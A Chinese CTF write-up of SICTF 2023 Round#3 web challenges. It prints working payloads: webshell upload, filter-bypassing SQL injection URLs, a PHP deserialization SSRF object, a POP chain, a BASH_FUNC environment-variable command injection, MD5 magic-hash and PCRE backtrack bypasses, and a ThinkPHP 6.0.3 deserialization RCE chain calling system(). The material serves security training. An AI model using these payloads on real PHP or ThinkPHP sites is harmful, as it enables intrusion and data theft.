SICTF 2023 Round#3 团队赛 Web 方向个人题解
February 21, 2024 · Legacy Blog ↗
100%_upload
将一句话木马 Base64 编码后上传,然后用 filter 将其 include。
hacker
试了下发现只有 ?username=flag 是有值的,那就接着写 SQL 吧!稍微有点过滤,问题不大:
view-source:http://yuanshen.life:39528/?username=flag%27/**/union/**/select/**/(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/database_name=database())%23
可以查到有这些表: flag, users
view-source:http://yuanshen.life:39528/?username=flag%27/**/union/**/select/**/(select/**/group_concat(a,%27,%27,b,%27,%27,c)/**/from/**/(select/**/1/**/as/**/a,2/**/as/**/b,3/**/as/**/c/**/union/**/select/**/*/**/from/**/users)as/**/d)%23
users 表里没啥东西
view-source:http://yuanshen.life:39528/?username=flag%27/**/union/**/select/**/(select/**/group_concat(a,%27,%27,b)/**/from/**/(select/**/1/**/as/**/a,2/**/as/**/b/**/union/**/select/**/*/**/from/**/flag)as/**/d)%23
flag 真的在 flag 表里: flag, SICTF{5b6247d8-9e5b-4cbc-a579-9d779fec77ef}
EZ_SSRF
不要相信出题人说 Flag 在 /flag 就可以了:
// Minimal stand-in for the challenge's `client` class: only the class name,
// the property names and their declaration order matter, because that is
// exactly what serialize() emits and what the target's unserialize() maps
// back onto its own `client` class.
class client
{
    public $url;
    public $payload;
}

// A file:// URL instead of the /flag path the challenge text suggests; the
// server-side fetch of $url is what turns this into an SSRF/local file read.
$target = 'file:///var/www/html/flag.php';

$obj = new client();
$obj->url = $target;
$obj->payload = null; // left untouched in the original; serializes as N; either way

print(serialize($obj));
Not just unserialize
POP 链并不难构造:
// Assemble the object graph start -> SE -> CR -> ET in the same construction
// and assignment order as the reference solution; the four classes are
// defined in the challenge source, not on this page, so nothing about their
// magic methods can be stated here.
$obj = new start();
$obj->you = '233';

$welcome = new SE();
$obj->welcome = $welcome;

$year = new CR();
$welcome->year = $year;
$year->newyear = "WORRIES";
$year->last = new ET();

echo base64_encode(serialize($obj));
有点难度的是利用环境变量进行 RCE,还好有参考资料。
get[BASH_FUNC_echo%%]=%28%29%20%7B%20cat%20%2F%2A%3B%20%7D
^ () { cat /*; }
Oyst3rPHP
这题有源代码泄露,直接把 www.zip 扒下来一看,果然是 ThinkPHP。
/**
 * Challenge entry point (a ThinkPHP controller action; the class header is
 * not part of this excerpt).
 *
 * Reads `left`/`right` from the query string and `key`/`payload` from the
 * POST body, then unserializes the decoded payload once both "oyster" checks
 * pass. Every input is attacker-controlled and each gate has a known
 * weakness, noted inline. The application-side fix is to never call
 * unserialize() on request data at all: use json_decode(), or at minimum
 * `unserialize($s, ['allowed_classes' => false])`.
 */
public function index()
{
    echo "RT,一个很简单的Web,给大家送一点分,再送三只生蚝,过年一起吃生蚝哈";
    echo "<img src='../Oyster.png'" . "/>";
    // `@` only hides the undefined-index notice; the value is fully user-controlled.
    $payload = base64_decode(@$_POST['payload']);
    // The names are swapped (`$right` holds ?left and vice versa). Harmless
    // here because the comparison below is symmetric.
    $right = @$_GET['left'];
    $left = @$_GET['right'];
    $key = (string)@$_POST['key'];
    // Gate #1: loose `==` on two hex digests. PHP compares two numeric-looking
    // strings numerically, so digests of the form "0e<digits>" all evaluate
    // to 0 and compare equal although the inputs differ.
    // Fix: `hash_equals(md5($right), md5($left))` (or at least `===`).
    if ($right !== $left && md5($right) == md5($left)) {
        echo "Congratulations on getting your first oyster";
        echo "<img src='../Oyster1.png'" . "/>";
        // Gate #2: preg_match() returns false (not 0) when PCRE aborts, e.g.
        // when the backtrack limit is exceeded on a very long $key. false is
        // falsy, so the die() is skipped for exactly the inputs that should
        // be rejected. Fix: test `!== 0` and treat
        // `preg_last_error() !== PREG_NO_ERROR` as a rejection.
        if (preg_match('/.+?THINKPHP/is', $key)) {
            die("Oysters don't want you to eat");
        }
        // Gate #3: case-insensitive substring check; '603THINKPHP' must appear in $key.
        if (stripos($key, '603THINKPHP') === false) {
            die("!!!Oysters don't want you to eat!!!");
        }
        echo "WOW!!!Congratulations on getting your second oyster";
        echo "<img src='../Oyster2.png'" . "/>";
        // Deserialization of untrusted input: every class the framework can
        // autoload becomes a candidate gadget (__destruct/__wakeup paths).
        // `@` suppresses notices only; it does not make this call safe.
        @unserialize($payload);
        // The last oyster is in the root directory and has the Flag in it??? How do you find it??? What is its name???
        // A comment somewhere in the source gives the hint — this tests whether you really understand the Oyst3rphp framework!!!
        // Small tip: the "xì gǒu" (细狗) function ┗|`O′|┛ awoo~~
    }
}
这部分并不难绕,主要还是 ThinkPHP 6.0.3 的反序列化 RCE。网上随便扒个 Exp 下来:
// --- Gadget definitions: exploit-side stand-ins, not the framework code ---
//
// These declare classes under the same fully-qualified names as ThinkPHP's
// think\Model / think\model\Pivot so that serialize() produces objects the
// target's autoloaded classes are mapped onto. Property names, visibilities
// (private members are name-mangled with the declaring class) and declaration
// order all determine the serialized bytes, so they must not be rearranged.
// What the real classes do with these values is not shown on this page; the
// defensive takeaway is that any application-wide class graph becomes
// reachable the moment unserialize() sees request data.
namespace think\model\concern;
trait Attribute
{
    // $data['key'] is the argument and $withAttr['key'] the callable that the
    // framework's attribute accessor presumably applies to it — here the
    // callable is `system`, i.e. a shell command (TODO confirm against
    // think\model\concern\Attribute in ThinkPHP 6.0.3).
    private $data = ["key" => "cat /Oyst3333333r.php"];
    private $withAttr = ["key" => "system"];
}
namespace think;
abstract class Model
{
    use model\concern\Attribute;
    // Flags that, in the real class, are presumably what steers the
    // destructor into its save path on an "existing" model — verify against
    // the framework source before relying on this description.
    private $lazySave = true;
    protected $withEvent = false;
    private $exists = true;
    private $force = true;
    // Receives another model instance via the constructor (see the nested
    // `new Pivot($a)` call further down); the inner object is what the chain
    // continues through.
    protected $name;
    public function __construct($obj = "")
    {
        $this->name = $obj;
    }
}
namespace think\model;
use think\Model;
// Concrete subclass: Model is abstract, so serialize() needs an instantiable
// class name that the target also autoloads.
class Pivot extends Model
{
}
// Outer model carrying an inner one in its $name property, emitted as the
// base64-encoded serialized form that the challenge's `payload` field expects.
$inner = new Pivot();
$outer = new Pivot($inner);
print(base64_encode(serialize($outer)));
// fetch("http://yuanshen.life:37154/?left=QNKCDZO&right=240610708", {
// "headers": { "content-type": "application/x-www-form-urlencoded" },
// "body": "key=" + "0".repeat(1000000) + "603THINKPHP&payload=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",
// "method": "POST"
// }); Tags: #CTF #Writeup #Web #SICTF
This article is authored by luoingly and licensed under CC BY-NC 4.0